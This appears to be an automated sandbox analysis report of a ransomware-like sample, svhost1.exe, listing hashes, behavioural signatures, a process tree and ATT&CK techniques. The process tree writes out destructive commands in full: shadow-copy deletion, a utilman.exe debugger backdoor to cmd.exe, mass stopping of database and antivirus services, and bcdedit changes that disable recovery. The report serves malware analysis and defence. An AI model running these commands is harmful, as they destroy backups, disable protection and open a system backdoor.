Analysis

  • max time kernel
    66s
  • max time network
    48s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    09-05-2020 18:48

General

  • Target

    svhost1.exe

  • Size

    2.8MB

  • MD5

    0527539f8c9af38ea8c36e9d2be595cd

  • SHA1

    a9d38a3b10c1d3dbf5eb00024303877e3c84cdab

  • SHA256

    247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536

  • SHA512

    00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4

Malware Config

Signatures

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of WriteProcessMemory 94 IoCs
  • Runs net.exe
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Sets file execution options in registry 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1643 IoCs
  • Drops file in Windows directory 44 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies service 2 TTPs 5 IoCs
  • Drops file in Program Files directory 346 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\svhost1.exe
    "C:\Users\Admin\AppData\Local\Temp\svhost1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops desktop.ini file(s)
    • Drops file in Windows directory
    • Drops file in Program Files directory
    PID:664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoExit -Command -
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:868
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" view
        3⤵
        • Discovers systems in the same network
        PID:1080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoExit -Command -
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2092
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3712
      • C:\Windows\system32\vssadmin.exe
        "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:3180
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
        3⤵
        • Sets file execution options in registry
        PID:1872
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
        3⤵
        • Sets file execution options in registry
        PID:1912
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3528
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
        3⤵
          PID:3328
        • C:\Windows\System32\Wbem\WMIC.exe
          "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
          3⤵
            PID:2272
          • C:\Windows\System32\Wbem\WMIC.exe
            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
            3⤵
              PID:496
            • C:\Windows\System32\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
              3⤵
                PID:3648
              • C:\Windows\System32\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
                3⤵
                  PID:3800
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
                  3⤵
                    PID:1080
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
                    3⤵
                      PID:2860
                    • C:\Windows\System32\Wbem\WMIC.exe
                      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice
                      3⤵
                        PID:732
                      • C:\Windows\System32\Wbem\WMIC.exe
                        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice
                        3⤵
                          PID:2108
                        • C:\Windows\System32\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice
                          3⤵
                            PID:3552
                          • C:\Windows\System32\Wbem\WMIC.exe
                            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice
                            3⤵
                              PID:276
                            • C:\Windows\System32\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice
                              3⤵
                                PID:3888
                              • C:\Windows\System32\Wbem\WMIC.exe
                                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice
                                3⤵
                                  PID:3540
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice
                                  3⤵
                                    PID:1836
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
                                    3⤵
                                      PID:2252
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice
                                      3⤵
                                        PID:3052
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice
                                        3⤵
                                          PID:508
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice
                                          3⤵
                                            PID:3996
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice
                                            3⤵
                                              PID:3992
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate
                                              3⤵
                                                PID:2220
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate
                                                3⤵
                                                  PID:992
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate
                                                  3⤵
                                                    PID:1060
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate
                                                    3⤵
                                                      PID:1800
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate
                                                      3⤵
                                                        PID:1008
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate
                                                        3⤵
                                                          PID:268
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate
                                                          3⤵
                                                            PID:3848
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate
                                                            3⤵
                                                              PID:1476
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate
                                                              3⤵
                                                                PID:1872
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate
                                                                3⤵
                                                                  PID:3084
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate
                                                                  3⤵
                                                                    PID:3132
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate
                                                                    3⤵
                                                                      PID:2252
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate
                                                                      3⤵
                                                                        PID:3444
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate
                                                                        3⤵
                                                                          PID:508
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate
                                                                          3⤵
                                                                            PID:3996
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate
                                                                            3⤵
                                                                              PID:3992
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate
                                                                              3⤵
                                                                                PID:1068
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate
                                                                                3⤵
                                                                                  PID:1252
                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                  "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text
                                                                                  3⤵
                                                                                  • Modifies boot configuration data using bcdedit
                                                                                  PID:408
                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                  "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text
                                                                                  3⤵
                                                                                  • Modifies boot configuration data using bcdedit
                                                                                  PID:1060
                                                                            • C:\Windows\system32\vssvc.exe
                                                                              C:\Windows\system32\vssvc.exe
                                                                              1⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Modifies service
                                                                              PID:3340

                                                                            Network

                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                            Persistence

                                                                            Registry Run Keys / Startup Folder

                                                                            1
                                                                            T1060

                                                                            Modify Existing Service

                                                                            1
                                                                            T1031

                                                                            Defense Evasion

                                                                            File Deletion

                                                                            2
                                                                            T1107

                                                                            Modify Registry

                                                                            2
                                                                            T1112

                                                                            Credential Access

                                                                            Credentials in Files

                                                                            1
                                                                            T1081

                                                                            Discovery

                                                                            Remote System Discovery

                                                                            1
                                                                            T1018

                                                                            Collection

                                                                            Data from Local System

                                                                            1
                                                                            T1005

                                                                            Impact

                                                                            Inhibit System Recovery

                                                                            3
                                                                            T1490

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive